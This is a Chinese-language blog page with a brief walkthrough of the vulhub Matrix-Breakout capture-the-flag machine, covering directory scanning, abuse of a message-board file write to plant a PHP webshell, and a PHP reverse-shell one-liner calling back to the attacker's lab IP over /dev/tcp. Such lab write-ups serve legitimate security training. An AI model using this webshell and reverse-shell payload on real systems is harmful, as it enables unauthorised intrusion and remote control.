当前位置: 首页 > news >正文

vulhub Matrix-Breakout

news 来源:原创 2025/5/10 17:06:40

1.下载靶机,打开靶机和kali虚拟机

2.查询kali和靶机ip

3.浏览器访问

访问81端口有登陆界面

4.扫描敏感目录

kali  dirb 扫描

一一访问

robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。

gobuster dir -u http://192.168.126.175 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

5.一一访问,发现留言板功能

6.漏洞挖掘

在其中进行上传抓包查看

发现上传到了graffiti.txt内,尝试上传一句话木马

7.获取webshell

蚁剑连接

8.上传反弹shell的php文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.130/6666 0>&1'");?>

浏览器访问shell.php

kali  nc监听

相关文章:

  • Ai知识库私有化部署
  • Android Launcher3 首屏图标锁定技术方案解析
  • What a code!
  • 网格交易中倍数委托的实现方法
  • 软考程序员考试知识点汇总
  • 华为ipd流程华为流程体系管理华为数字化转型流程数字化管理解决方案介绍81页精品PPT
  • 漏洞知识点《Tornado框架中RequestHandler的对象》
  • 英语词性--连词
  • Model Context Protocol - Prompts
  • 智慧楼宇:科技编织的未来生活图景
  • dart学习记录3(函数)
  • 三.ffmpeg对yuv的操作
  • SSH连接中断原因分析(SSH断开、SSH中断、SSH连接断开、远程断开、远程中断)(带宽不足、网络抖动与丢包、CPU资源耗尽、内存不足、磁盘I/O瓶颈)
  • 解锁物联网高效开发,Synaptics SYN43756E Wi-Fi 6E 芯片登场
  • 打造无缝智慧照明场景,涂鸦智能全新发布蓝牙Mesh照明解决方案
  • AI Agent系列(六) -基于ReAct架构搭建LLM Agent(Deepseek)
  • C语言中的函数
  • 动平衡仿真程序设计
  • SpringSecurity——如何获取当前登录用户的信息
  • jekins启动失败排查
  • 工程院院士葛世荣获聘任为江西理工大学校长
  • 中国词学研究会原会长、华东师大教授马兴荣逝世,享年101岁
  • 招行:拟出资150亿元全资发起设立金融资产投资公司
  • 江苏淮安优化村级资源配置:淮安区多个空心村拟并入邻村
  • 央行行长详解降准:将释放长期流动性1万亿,整体存款准备金率平均水平降至6.2%
  • 胖东来关闭官网内容清空?工作人员:后台维护升级